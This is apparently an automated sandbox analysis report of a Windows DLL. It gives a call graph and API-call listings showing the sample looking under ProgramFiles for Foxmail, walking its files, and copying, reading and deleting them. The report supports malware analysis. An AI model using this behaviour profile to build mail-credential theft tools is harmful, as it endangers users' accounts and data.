5797->5800 5799 10001c87 5801 10001324 ___scrt_fastfail 5800->5801 5802 100013b7 GetEnvironmentVariableW 5801->5802 5826 100010f1 5802->5826 5805 100010f1 57 API calls 5806 10001465 5805->5806 5807 100010f1 57 API calls 5806->5807 5808 10001479 5807->5808 5809 100010f1 57 API calls 5808->5809 5810 1000148d 5809->5810 5811 100010f1 57 API calls 5810->5811 5812 100014a1 5811->5812 5813 100010f1 57 API calls 5812->5813 5814 100014b5 lstrlenW 5813->5814 5815 100014d2 5814->5815 5816 100014d9 lstrlenW 5814->5816 5815->5799 5817 100010f1 57 API calls 5816->5817 5818 10001501 lstrlenW lstrcatW 5817->5818 5819 100010f1 57 API calls 5818->5819 5820 10001539 lstrlenW lstrcatW 5819->5820 5821 100010f1 57 API calls 5820->5821 5822 1000156b lstrlenW lstrcatW 5821->5822 5823 100010f1 57 API calls 5822->5823 5824 1000159d lstrlenW lstrcatW 5823->5824 5825 100010f1 57 API calls 5824->5825 5825->5815 5827 10001118 ___scrt_fastfail 5826->5827 5828 10001129 lstrlenW 5827->5828 5839 10002c40 5828->5839 5831 10001177 lstrlenW FindFirstFileW 5833 100011a0 5831->5833 5834 100011e1 5831->5834 5832 10001168 lstrlenW 5832->5831 5835 100011c7 FindNextFileW 5833->5835 5836 100011aa 5833->5836 5834->5805 5835->5833 5838 100011da FindClose 5835->5838 5836->5835 5841 10001000 5836->5841 5838->5834 5840 10001148 lstrcatW lstrlenW 5839->5840 5840->5831 5840->5832 5842 10001022 ___scrt_fastfail 5841->5842 5843 100010af 5842->5843 5844 1000102f lstrcatW lstrlenW 5842->5844 5847 100010b5 lstrlenW 5843->5847 5857 100010ad 5843->5857 5845 1000105a lstrlenW 5844->5845 5846 1000106b lstrlenW 5844->5846 5845->5846 5858 10001e89 lstrlenW 5846->5858 5872 10001e16 5847->5872 5850 10001088 GetFileAttributesW 5853 1000109c 5850->5853 5850->5857 5851 100010ca 5852 10001e89 5 API calls 5851->5852 5851->5857 5854 100010df 5852->5854 5853->5857 5864 1000173a 5853->5864 5877 100011ea 5854->5877 5857->5836 5859 10002c40 ___scrt_fastfail 5858->5859 5860 10001ea7 lstrcatW lstrlenW 5859->5860 5861 10001ed1 lstrcatW 5860->5861 5862 10001ec2 5860->5862 5861->5850 5862->5861 5863 10001ec7 lstrlenW 5862->5863 5863->5861 5865 10001747 ___scrt_fastfail 5864->5865 5892 10001cca 5865->5892 5868 1000199f 5868->5857 5870 10001824 ___scrt_fastfail _strlen 5870->5868 5912 100015da 5870->5912 5873 10001e29 5872->5873 5876 10001e4c 5872->5876 5874 10001e2d lstrlenW 5873->5874 5873->5876 5875 10001e3f lstrlenW 5874->5875 5874->5876 5875->5876 5876->5851 5878 1000120e ___scrt_fastfail 5877->5878 5879 10001e89 5 API calls 5878->5879 5880 10001220 GetFileAttributesW 5879->5880 5881 10001235 5880->5881 5882 10001246 5880->5882 5881->5882 5884 1000173a 35 API calls 5881->5884 5883 10001e89 5 API calls 5882->5883 5885 10001258 5883->5885 5884->5882 5886 100010f1 56 API calls 5885->5886 5887 1000126d 5886->5887 5888 10001e89 5 API calls 5887->5888 5889 1000127f ___scrt_fastfail 5888->5889 5890 100010f1 56 API calls 5889->5890 5891 100012e6 5890->5891 5891->5857 5893 10001cf1 ___scrt_fastfail 5892->5893 5894 10001d0f CopyFileW CreateFileW 5893->5894 5895 10001d44 DeleteFileW 5894->5895 5896 10001d55 GetFileSize 5894->5896 5901 10001808 5895->5901 5897 10001ede 22 API calls 5896->5897 5898 10001d66 ReadFile 5897->5898 5899 10001d94 CloseHandle DeleteFileW 5898->5899 5900 10001d7d CloseHandle DeleteFileW 5898->5900 5899->5901 5900->5901 5901->5868 5902 10001ede 5901->5902 5904 1000222f 5902->5904 5905 1000224e 5904->5905 5908 10002250 5904->5908 5920 1000474f 5904->5920 5925 100047e5 5904->5925 5905->5870 5907 10002908 5909 100035d2 __CxxThrowException@8 RaiseException 5907->5909 5908->5907 5932 100035d2 5908->5932 5911 10002925 5909->5911 5911->5870 5913 1000160c _strcat _strlen 5912->5913 5914 1000163c lstrlenW 5913->5914 6020 10001c9d 5914->6020 5916 10001655 lstrcatW lstrlenW 5917 10001678 5916->5917 5918 10001693 ___scrt_fastfail 5917->5918 5919 1000167e lstrcatW 5917->5919 5918->5870 5919->5918 5935 10004793 5920->5935 5922 10004765 5941 10002ada 5922->5941 5924 1000478f 5924->5904 5930 100056d0 _abort 5925->5930 5926 1000570e 5954 10006368 5926->5954 5927 100056f9 RtlAllocateHeap 5929 1000570c 5927->5929 5927->5930 5929->5904 5930->5926 5930->5927 5931 1000474f _abort 7 API calls 5930->5931 5931->5930 5934 100035f2 RaiseException 5932->5934 5934->5907 5936 1000479f ___scrt_is_nonwritable_in_current_image 5935->5936 5948 10005671 RtlEnterCriticalSection 5936->5948 5938 100047aa 5949 100047dc 5938->5949 5940 100047d1 _abort 5940->5922 5942 10002ae3 5941->5942 5943 10002ae5 IsProcessorFeaturePresent 5941->5943 5942->5924 5945 10002b58 5943->5945 5953 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5945->5953 5947 10002c3b 5947->5924 5948->5938 5952 100056b9 RtlLeaveCriticalSection 5949->5952 5951 100047e3 5951->5940 5952->5951 5953->5947 5957 10005b7a GetLastError 5954->5957 5958 10005b93 5957->5958 5959 10005b99 5957->5959 5976 10005e08 5958->5976 5963 10005bf0 SetLastError 5959->5963 5983 1000637b 5959->5983 5965 10005bf9 5963->5965 5964 10005bb3 5990 1000571e 5964->5990 5965->5929 5969 10005bb9 5971 10005be7 SetLastError 5969->5971 5970 10005bcf 6003 1000593c 5970->6003 5971->5965 5974 1000571e _free 17 API calls 5975 10005be0 5974->5975 5975->5963 5975->5971 6008 10005c45 5976->6008 5978 10005e2f 5979 10005e47 TlsGetValue 5978->5979 5980 10005e3b 5978->5980 5979->5980 5981 10002ada _ValidateLocalCookies 5 API calls 5980->5981 5982 10005e58 5981->5982 5982->5959 5988 10006388 _abort 5983->5988 5984 100063c8 5986 10006368 _free 19 API calls 5984->5986 5985 100063b3 RtlAllocateHeap 5987 10005bab 5985->5987 5985->5988 5986->5987 5987->5964 5996 10005e5e 5987->5996 5988->5984 5988->5985 5989 1000474f _abort 7 API calls 5988->5989 5989->5988 5991 10005752 _free 5990->5991 5992 10005729 HeapFree 5990->5992 5991->5969 5992->5991 5993 1000573e 5992->5993 5994 10006368 _free 18 API calls 5993->5994 5995 10005744 GetLastError 5994->5995 5995->5991 5997 10005c45 _abort 5 API calls 5996->5997 5998 10005e85 5997->5998 5999 10005ea0 TlsSetValue 5998->5999 6000 10005e94 5998->6000 5999->6000 6001 10002ada _ValidateLocalCookies 5 API calls 6000->6001 6002 10005bc8 6001->6002 6002->5964 6002->5970 6014 10005914 6003->6014 6011 10005c71 6008->6011 6013 10005c75 __crt_fast_encode_pointer 6008->6013 6009 10005c95 6012 10005ca1 GetProcAddress 6009->6012 6009->6013 6010 10005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6010->6011 6011->6009 6011->6010 6011->6013 6012->6013 6013->5978 6015 10005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6014->6015 6016 10005938 6015->6016 6017 100058c4 6016->6017 6018 10005758 _abort 20 API calls 6017->6018 6019 100058e8 6018->6019 6019->5974 6021 10001ca6 _strlen 6020->6021 6021->5916 7020 100020db 7021 100020e7 ___scrt_is_nonwritable_in_current_image 7020->7021 7022 10002110 dllmain_raw 7021->7022 7027 1000210b 7021->7027 7031 100020f6 7021->7031 7023 1000212a 7022->7023 7022->7031 7033 10001eec 7023->7033 7025 10002177 7026 10001eec 31 API calls 7025->7026 7025->7031 7028 1000218a 7026->7028 7027->7025 7030 10001eec 31 API calls 7027->7030 7027->7031 7029 10002193 dllmain_raw 7028->7029 7028->7031 7029->7031 7032 1000216d dllmain_raw 7030->7032 7032->7025 7034 10001ef7 7033->7034 7035 10001f2a dllmain_crt_process_detach 7033->7035 7036 10001f1c dllmain_crt_process_attach 7034->7036 7037 10001efc 7034->7037 7042 10001f06 7035->7042 7036->7042 7038 10001f12 7037->7038 7040 10001f01 7037->7040 7048 100023ec 7038->7048 7040->7042 7043 1000240b 7040->7043 7042->7027 7056 100053e5 7043->7056 7154 10003513 7048->7154 7051 100023f5 7051->7042 7054 10002408 7054->7042 7055 1000351e 7 API calls 7055->7051 7062 10005aca 7056->7062 7059 1000351e 7138 10003820 7059->7138 7061 10002415 7061->7042 7063 10005ad4 7062->7063 7064 10002410 7062->7064 7065 10005e08 _abort 11 API calls 7063->7065 7064->7059 7066 10005adb 7065->7066 7066->7064 7067 10005e5e _abort 11 API calls 7066->7067 7068 10005aee 7067->7068 7070 100059b5 7068->7070 7071 100059c0 7070->7071 7072 100059d0 7070->7072 7076 100059d6 7071->7076 7072->7064 7075 1000571e _free 20 API calls 7075->7072 7077 100059ef 7076->7077 7078 100059e9 7076->7078 7080 1000571e _free 20 API calls 7077->7080 7079 1000571e _free 20 API calls 7078->7079 7079->7077 7081 100059fb 7080->7081 7082 1000571e _free 20 API calls 7081->7082 7083 10005a06 7082->7083 7084 1000571e _free 20 API calls 7083->7084 7085 10005a11 7084->7085 7086 1000571e _free 20 API calls 7085->7086 7087 10005a1c 7086->7087 7088 1000571e _free 20 API calls 7087->7088 7089 10005a27 7088->7089 7090 1000571e _free 20 API calls 7089->7090 7091 10005a32 7090->7091 7092 1000571e _free 20 API calls 7091->7092 7093 10005a3d 7092->7093 7094 1000571e _free 20 API calls 7093->7094 7095 10005a48 7094->7095 7096 1000571e _free 20 API calls 7095->7096 7097 10005a56 7096->7097 7102 1000589c 7097->7102 7108 100057a8 7102->7108 7104 100058c0 7105 100058ec 7104->7105 7121 10005809 7105->7121 7107 10005910 7107->7075 7109 100057b4 ___scrt_is_nonwritable_in_current_image 7108->7109 7116 10005671 RtlEnterCriticalSection 7109->7116 7112 100057be 7113 1000571e _free 20 API calls 7112->7113 7115 100057e8 7112->7115 7113->7115 7114 100057f5 _abort 7114->7104 7117 100057fd 7115->7117 7116->7112 7120 100056b9 RtlLeaveCriticalSection 7117->7120 7119 10005807 7119->7114 7120->7119 7122 10005815 ___scrt_is_nonwritable_in_current_image 7121->7122 7129 10005671 RtlEnterCriticalSection 7122->7129 7124 1000581f 7130 10005a7f 7124->7130 7126 10005832 7134 10005848 7126->7134 7128 10005840 _abort 7128->7107 7129->7124 7131 10005a8e _abort 7130->7131 7133 10005ab5 _abort 7130->7133 7132 10007cc2 _abort 20 API calls 7131->7132 7131->7133 7132->7133 7133->7126 7137 100056b9 RtlLeaveCriticalSection 7134->7137 7136 10005852 7136->7128 7137->7136 7139 1000382d 7138->7139 7143 1000384b ___vcrt_freefls@4 7138->7143 7140 1000383b 7139->7140 7144 10003b67 7139->7144 7149 10003ba2 7140->7149 7143->7061 7145 10003a82 try_get_function 5 API calls 7144->7145 7146 10003b81 7145->7146 7147 10003b99 TlsGetValue 7146->7147 7148 10003b8d 7146->7148 7147->7148 7148->7140 7150 10003a82 try_get_function 5 API calls 7149->7150 7151 10003bbc 7150->7151 7152 10003bd7 TlsSetValue 7151->7152 7153 10003bcb 7151->7153 7152->7153 7153->7143 7160 10003856 7154->7160 7156 100023f1 7156->7051 7157 100053da 7156->7157 7158 10005b7a _free 20 API calls 7157->7158 7159 100023fd 7158->7159 7159->7054 7159->7055 7161 10003862 GetLastError 7160->7161 7162 1000385f 7160->7162 7163 10003b67 ___vcrt_FlsGetValue 6 API calls 7161->7163 7162->7156 7164 10003877 7163->7164 7165 100038dc SetLastError 7164->7165 7166 10003ba2 ___vcrt_FlsSetValue 6 API calls 7164->7166 7171 10003896 7164->7171 7165->7156 7167 10003890 7166->7167 7168 10003ba2 ___vcrt_FlsSetValue 6 API calls 7167->7168 7170 100038b8 7167->7170 7167->7171 7168->7170 7169 10003ba2 ___vcrt_FlsSetValue 6 API calls 7169->7171 7170->7169 7170->7171 7171->7165 7672 10004bdd 7673 10004c08 7672->7673 7674 10004bec 7672->7674 7676 10006d60 51 API calls 7673->7676 7674->7673 7675 10004bf2 7674->7675 7677 10006368 _free 20 API calls 7675->7677 7678 10004c0f GetModuleFileNameA 7676->7678 7679 10004bf7 7677->7679 7680 10004c33 7678->7680 7681 100062ac ___std_exception_copy 26 API calls 7679->7681 7695 10004d01 7680->7695 7682 10004c01 7681->7682 7687 10004c72 7690 10004d01 38 API calls 7687->7690 7688 10004c66 7689 10006368 _free 20 API calls 7688->7689 7694 10004c6b 7689->7694 7692 10004c88 7690->7692 7691 1000571e _free 20 API calls 7691->7682 7693 1000571e _free 20 API calls 7692->7693 7692->7694 7693->7694 7694->7691 7697 10004d26 7695->7697 7699 10004d86 7697->7699 7707 100070eb 7697->7707 7698 10004c50 7701 10004e76 7698->7701 7699->7698 7700 100070eb 38 API calls 7699->7700 7700->7699 7702 10004c5d 7701->7702 7703 10004e8b 7701->7703 7702->7687 7702->7688 7703->7702 7704 1000637b _abort 20 API calls 7703->7704 7705 10004eb9 7704->7705 7706 1000571e _free 20 API calls 7705->7706 7706->7702 7710 10007092 7707->7710 7711 100054a7 38 API calls 7710->7711 7712 100070a6 7711->7712 7712->7697 6649 10007260 GetStartupInfoW 6650 10007318 6649->6650 6651 10007286 6649->6651 6651->6650 6652 100072dd GetFileType 6651->6652 6652->6651 7713 1000a1e0 7716 1000a1fe 7713->7716 7715 1000a1f6 7717 1000a203 7716->7717 7718 1000aa53 21 API calls 7717->7718 7720 1000a298 7717->7720 7719 1000a42f 7718->7719 7719->7715 7720->7715 7517 10009d61 7518 10009d81 7517->7518 7521 10009db8 7518->7521 7520 10009dab 7522 10009dbf 7521->7522 7523 10009e20 7522->7523 7525 10009ddf 7522->7525 7524 1000aa17 21 API calls 7523->7524 7527 1000a90e 7523->7527 7526 10009e6e 7524->7526 7525->7527 7528 1000aa17 21 API calls 7525->7528 7526->7520 7527->7520 7529 1000a93e 7528->7529 7529->7520 7530 10006761 7531 1000677f 7530->7531 7535 100066e6 7530->7535 7538 100081a0 7531->7538 7532 100066f2 7536 10002ada _ValidateLocalCookies 5 API calls 7532->7536 7533 100066eb FindClose 7533->7532 7535->7532 7535->7533 7537 10006701 7536->7537 7539 100081d9 7538->7539 7540 100081dd 7539->7540 7551 10008205 7539->7551 7541 10006368 _free 20 API calls 7540->7541 7542 100081e2 7541->7542 7544 100062ac ___std_exception_copy 26 API calls 7542->7544 7543 10008529 7545 10002ada _ValidateLocalCookies 5 API calls 7543->7545 7546 100081ed 7544->7546 7547 10008536 7545->7547 7548 10002ada _ValidateLocalCookies 5 API calls 7546->7548 7547->7535 7550 100081f9 7548->7550 7550->7535 7551->7543 7552 100080c0 7551->7552 7555 100080db 7552->7555 7553 10002ada _ValidateLocalCookies 5 API calls 7554 10008152 7553->7554 7554->7551 7555->7553 6653 10006664 6654 10006675 6653->6654 6655 10002ada _ValidateLocalCookies 5 API calls 6654->6655 6656 10006701 6655->6656 6657 1000ac6b 6658 1000ac84 __startOneArgErrorHandling 6657->6658 6659 1000acad __startOneArgErrorHandling 6658->6659 6661 1000b2f0 6658->6661 6662 1000b329 __startOneArgErrorHandling 6661->6662 6664 1000b350 __startOneArgErrorHandling 6662->6664 6672 1000b5c1 6662->6672 6665 1000b393 6664->6665 6666 1000b36e 6664->6666 6685 1000b8b2 6665->6685 6676 1000b8e1 6666->6676 6669 1000b38e __startOneArgErrorHandling 6670 10002ada _ValidateLocalCookies 5 API calls 6669->6670 6671 1000b3b7 6670->6671 6671->6659 6673 1000b5ec __raise_exc 6672->6673 6674 1000b7e5 RaiseException 6673->6674 6675 1000b7fd 6674->6675 6675->6664 6677 1000b8f0 6676->6677 6678 1000b964 __startOneArgErrorHandling 6677->6678 6679 1000b90f __startOneArgErrorHandling 6677->6679 6681 1000b8b2 __startOneArgErrorHandling 20 API calls 6678->6681 6692 100078a3 6679->6692 6684 1000b95d 6681->6684 6683 1000b8b2 __startOneArgErrorHandling 20 API calls 6683->6684 6684->6669 6686 1000b8d4 6685->6686 6687 1000b8bf 6685->6687 6689 10006368 _free 20 API calls 6686->6689 6688 1000b8d9 6687->6688 6690 10006368 _free 20 API calls 6687->6690 6688->6669 6689->6688 6691 1000b8cc 6690->6691 6691->6669 6693 100078cb 6692->6693 6694 10002ada _ValidateLocalCookies 5 API calls 6693->6694 6695 100078e8 6694->6695 6695->6683 6695->6684 7721 100085eb 7725 1000853a 7721->7725 7722 1000854f 7723 10006368 _free 20 API calls 7722->7723 7724 10008554 7722->7724 7726 1000857a 7723->7726 7725->7722 7725->7724 7728 1000858b 7725->7728 7727 100062ac ___std_exception_copy 26 API calls 7726->7727 7727->7724 7728->7724 7729 10006368 _free 20 API calls 7728->7729 7729->7726 7730 100065ec 7735 100067bf 7730->7735 7733 1000571e _free 20 API calls 7734 100065ff 7733->7734 7740 100067f4 7735->7740 7738 100065f6 7738->7733 7739 1000571e _free 20 API calls 7739->7738 7741 10006806 7740->7741 7750 100067cd 7740->7750 7742 10006836 7741->7742 7743 1000680b 7741->7743 7742->7750 7751 100071d6 7742->7751 7744 1000637b _abort 20 API calls 7743->7744 7745 10006814 7744->7745 7747 1000571e _free 20 API calls 7745->7747 7747->7750 7748 10006851 7749 1000571e _free 20 API calls 7748->7749 7749->7750 7750->7738 7750->7739 7752 100071e1 7751->7752 7753 10007209 7752->7753 7754 100071fa 7752->7754 7755 10007218 7753->7755 7760 10008a98 7753->7760 7756 10006368 _free 20 API calls 7754->7756 7767 10008acb 7755->7767 7758 100071ff ___scrt_fastfail 7756->7758 7758->7748 7761 10008aa3 7760->7761 7762 10008ab8 RtlSizeHeap 7760->7762 7763 10006368 _free 20 API calls 7761->7763 7762->7755 7764 10008aa8 7763->7764 7765 100062ac ___std_exception_copy 26 API calls 7764->7765 7766 10008ab3 7765->7766 7766->7755 7768 10008ae3 7767->7768 7769 10008ad8 7767->7769 7771 10008aeb 7768->7771 7777 10008af4 _abort 7768->7777 7770 100056d0 21 API calls 7769->7770 7775 10008ae0 7770->7775 7772 1000571e _free 20 API calls 7771->7772 7772->7775 7773 10008af9 7776 10006368 _free 20 API calls 7773->7776 7774 10008b1e RtlReAllocateHeap 7774->7775 7774->7777 7775->7758 7776->7775 7777->7773 7777->7774 7778 1000474f _abort 7 API calls 7777->7778 7778->7777 6696 10008c6e 6699 100056b9 RtlLeaveCriticalSection 6696->6699 6698 10008c79 6699->6698 6700 1000506f 6701 10005081 6700->6701 6702 10005087 6700->6702 6704 10005000 6701->6704 6705 1000502a 6704->6705 6706 1000500d 6704->6706 6705->6702 6707 10005024 6706->6707 6708 1000571e _free 20 API calls 6706->6708 6709 1000571e _free 20 API calls 6707->6709 6708->6706 6709->6705 7556 10003370 7567 10003330 7556->7567 7568 10003342 7567->7568 7569 1000334f 7567->7569 7570 10002ada _ValidateLocalCookies 5 API calls 7568->7570 7570->7569 6710 10009e71 6711 10009e95 6710->6711 6713 10009ee6 6711->6713 6716 10009f71 __startOneArgErrorHandling 6711->6716 6712 10009ef8 6713->6712 6718 1000aa53 6713->6718 6714 1000acad __startOneArgErrorHandling 6716->6714 6717 1000b2f0 21 API calls 6716->6717 6717->6714 6719 1000aa70 RtlDecodePointer 6718->6719 6720 1000aa80 6718->6720 6719->6720 6721 1000ab0d 6720->6721 6724 1000ab02 6720->6724 6726 1000aab7 6720->6726 6721->6724 6725 10006368 _free 20 API calls 6721->6725 6722 10002ada _ValidateLocalCookies 5 API calls 6723 1000ac67 6722->6723 6723->6712 6724->6722 6725->6724 6726->6724 6727 10006368 _free 20 API calls 6726->6727 6727->6724 6728 10008c72 6729 10008c79 6728->6729 6731 100056b9 RtlLeaveCriticalSection 6728->6731 6731->6729 7783 10005bff 7791 10005d5c 7783->7791 7786 10005b7a _free 20 API calls 7788 10005c1b 7786->7788 7787 10005c28 7788->7787 7789 10005c2b 11 API calls 7788->7789 7790 10005c13 7789->7790 7792 10005c45 _abort 5 API calls 7791->7792 7793 10005d83 7792->7793 7794 10005d9b TlsAlloc 7793->7794 7797 10005d8c 7793->7797 7794->7797 7795 10002ada _ValidateLocalCookies 5 API calls 7796 10005c09 7795->7796 7796->7786 7796->7790 7797->7795

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1083526818-0
                                                                                                                                                                                                                                            • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                                                            • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                                                                                            Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                                              • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                                              • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                                              • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                                              • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                            • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                            • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                                                            • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                                                                                                                            Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                                                                              • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2099061454-0
                                                                                                                                                                                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                            • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                                                                                            Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
